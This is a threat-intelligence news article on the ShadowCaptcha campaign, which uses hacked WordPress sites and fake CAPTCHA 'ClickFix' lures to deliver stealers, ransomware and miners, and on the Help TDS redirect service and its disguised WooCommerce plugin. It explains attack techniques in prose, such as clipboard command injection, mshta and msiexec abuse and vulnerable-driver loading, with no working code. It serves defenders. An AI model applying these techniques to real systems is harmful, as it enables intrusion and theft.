A significant new cyberattack campaign, dubbed ShadowCaptcha, has been identified, actively exploiting over 100 compromised WordPress websites. This extensive operation redirects unsuspecting site visitors to deceptive CAPTCHA verification pages. These pages ingeniously leverage the ClickFix social engineering technique, ultimately leading to the deployment of various malicious payloads, including sophisticated information stealers, potent ransomware, and insidious cryptocurrency miners.

First detected in August 2025, this large-scale cybercrime campaign was officially codenamed ShadowCaptcha by the Israel National Digital Agency, highlighting its stealthy and pervasive nature.

According to researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman, who published their findings, the ShadowCaptcha campaign is characterized by its sophisticated blending of social engineering tactics, the abuse of living-off-the-land binaries (LOLBins), and a multi-stage payload delivery system. This combination allows the attackers to establish and maintain a persistent foothold within targeted systems with remarkable efficacy.

The ultimate objectives of ShadowCaptcha are disturbingly broad, encompassing the collection of sensitive information through credential harvesting and browser data exfiltration, the deployment of cryptocurrency miners for illicit profit generation, and even the initiation of devastating ransomware outbreaks, underscoring the severe threat it poses.

ShadowCaptcha: A Multi-faceted Cyberattack Campaign

Initial Compromise and Redirection Chain

The initial phase of these attacks leverages compromised WordPress websites, which have been stealthily injected with malicious JavaScript code. When unsuspecting users visit these infected sites, the JavaScript code immediately triggers a complex redirection chain, ultimately leading them to highly convincing, yet entirely fake, Cloudflare or Google CAPTCHA verification pages.

Dual Attack Vectors and Payload Delivery

From these deceptive CAPTCHA pages, the attack chain bifurcates into two distinct pathways, dictated by the specific ClickFix instructions presented to the victim. One method involves the utilization of the Windows Run dialog, prompting users to execute malicious commands directly. The alternative approach guides victims to save a rendered web page as an HTML Application (HTA) file and subsequently execute it using the mshta.exe utility. Both vectors are meticulously crafted to bypass initial security checks and facilitate deeper system compromise.

The successful execution of commands via the Windows Run dialog path ultimately culminates in the deployment of potent information stealers such as Lumma and Rhadamanthys. These are typically delivered through MSI installers, launched via msiexec.exe, or through remotely-hosted HTA files executed by mshta.exe. Conversely, when victims are tricked into executing the saved HTA payload, the consequence is the installation of the formidable Epsilon Red ransomware, locking down user data.

Notably, the employment of ClickFix lures to coerce users into downloading malicious HTA files, specifically for the propagation of Epsilon Red ransomware, was previously documented by CloudSEK just last month, indicating a persistent and evolving threat landscape.

The deceptive nature of these compromised ClickFix pages is further amplified by automatically executed obfuscated JavaScript. This script cleverly leverages navigator.clipboard.writeText to silently copy a malicious command to the user's clipboard, requiring no direct interaction. The attackers then rely on the victim unknowingly pasting and executing this command, a subtle yet highly effective social engineering maneuver.

Evasion Tactics and Advanced Persistence

A hallmark of these sophisticated attacks is the integrated use of advanced evasion techniques. ShadowCaptcha employs anti-debugger mechanisms, specifically designed to thwart attempts at inspecting the malicious web pages using browser developer tools. Furthermore, the campaign heavily relies on DLL side-loading, a technique that allows malicious code to be executed under the guise of legitimate processes, thereby increasing its stealth and persistence within compromised systems.

In certain ShadowCaptcha campaigns, a different payload has been observed: an XMRig-based cryptocurrency miner. What makes these variants particularly adaptive is their ability to fetch mining configurations from a Pastebin URL instead of having them hard-coded directly into the malware. This dynamic approach grants the attackers significant flexibility, enabling them to adjust mining parameters, target cryptocurrencies, and resource allocation on the fly, maximizing their illicit gains.

Moreover, when miner payloads are successfully deployed, attackers have been observed dropping a specific vulnerable driver, "WinRing0x64.sys". This driver is utilized to achieve kernel-level access, allowing the malware to directly interact with CPU registers. The primary goal of this elevated access is to significantly improve mining efficiency, enabling the attackers to extract more computational power and, consequently, more cryptocurrency from compromised machines.

Geographic Reach and Compromise Vectors

An analysis of the infected WordPress sites reveals a widespread geographic distribution, with a majority located in countries such as Australia, Brazil, Italy, Canada, Colombia, and Israel. The victim organizations span diverse critical sectors, including technology, hospitality, legal and finance, healthcare, and real estate, demonstrating the indiscriminate nature of the campaign.

While the precise methods of initial WordPress site compromise remain under investigation, Yaniv Goldman informed The Hacker News that there is medium confidence suggesting attackers gained access through exploiting various known vulnerabilities in a range of WordPress plugins. Additionally, some instances point to the use of compromised administrator credentials to gain unauthorized entry to the WordPress portal, highlighting the importance of robust credential management.

Mitigation Strategies Against ShadowCaptcha

To effectively mitigate the substantial risks posed by the ShadowCaptcha campaign, a multi-layered defense strategy is essential. Firstly, comprehensive user training is crucial to educate individuals on recognizing and avoiding sophisticated social engineering tactics, particularly ClickFix campaigns. Secondly, network segmentation should be implemented to restrict lateral movement within an organization's infrastructure, thereby containing potential breaches. Lastly, maintaining WordPress sites with the latest security updates and patches, combined with the stringent application of multi-factor authentication (MFA) protections, are paramount to securing these widely used platforms against such advanced threats.

The researchers emphasize that ShadowCaptcha serves as a stark illustration of how social engineering attacks have evolved into full-spectrum cyber operations. By cunningly tricking users into executing built-in Windows tools and meticulously layering obfuscated scripts with vulnerable drivers, the operators achieve stealthy persistence, granting them the ability to pivot effortlessly between various malicious objectives, from data theft and cryptocurrency mining to devastating ransomware deployment.

The Evolving Landscape of Social Engineering Attacks

Help TDS: A Notorious Traffic Distribution System

This disclosure regarding ShadowCaptcha coincides with GoDaddy's detailed analysis of the ongoing evolution of Help TDS, a long-standing and notorious traffic distribution (or direction) system. Active since 2017, Help TDS has been consistently linked to various malicious schemes, including the prominent VexTrio Viper. This system functions by providing its partners and affiliates with pre-configured PHP code templates, which are then injected into compromised WordPress sites. The primary objective is to intelligently redirect unsuspecting users to a multitude of malicious destinations, carefully selected based on specific targeting criteria defined by the attackers.

Technical Modus Operandi of Help TDS

Security researcher Denis Sinegubko elaborated that Help TDS operations primarily specialize in elaborate tech support scams. These scams are meticulously crafted, employing full-screen browser manipulation and advanced exit prevention techniques designed to effectively trap victims on fraudulent Microsoft Windows security alert pages. Should these primary scams fail, the system intelligently falls back to alternative monetization strategies, including redirecting users to dating, cryptocurrency, and sweepstakes scams, ensuring continuous revenue for its operators.

Several prominent malware campaigns have notably leveraged Help TDS in recent years, including DollyWay, Balada Injector, and various DNS TXT redirects. The scam pages themselves are highly sophisticated, utilizing JavaScript to force browsers into full-screen mode, effectively displaying the fraudulent security alerts. To further enhance their evasion capabilities against automated security scanners, these pages often incorporate counterfeit CAPTCHA challenges before rendering the main deceptive content, adding another layer of trickery.

The 'woocommerce_inputs' Plugin: A Covert Threat

Between late 2024 and August 2025, Help TDS operators reportedly developed a particularly insidious malicious WordPress plugin, aptly named "woocommerce_inputs." This plugin was specifically designed to facilitate the core redirection functionality of Help TDS. Over time, its capabilities have steadily expanded to include sophisticated credential harvesting mechanisms, precise geographic filtering, and an array of advanced evasion techniques, making it a highly versatile tool for attackers. Alarmingly, this malicious plugin is estimated to be installed on over 10,000 WordPress sites globally, posing a significant and widespread threat.

To avoid detection by unsuspecting site owners and administrators, the "woocommerce_inputs" plugin cleverly masquerades as a legitimate WooCommerce component. Critically, its installation is not accidental; it is exclusively deployed by attackers only after they have successfully compromised WordPress sites, typically gaining access through the use of stolen administrator credentials.

GoDaddy's analysis highlights that this plugin serves a dual purpose, functioning both as an effective traffic monetization tool and a potent credential harvesting mechanism. This demonstrates a clear and continuous evolution from its initial, simpler redirect functionality to a sophisticated malware-as-a-service offering, indicating the strategic development by its creators.

Ultimately, by offering comprehensive, ready-made solutions—including robust Command and Control (C2) infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins—Help TDS has dramatically lowered the barrier to entry for cybercriminals. This accessibility empowers a broader range of malicious actors to effectively monetize infiltrated websites, contributing to the escalating threat landscape observed in campaigns like ShadowCaptcha.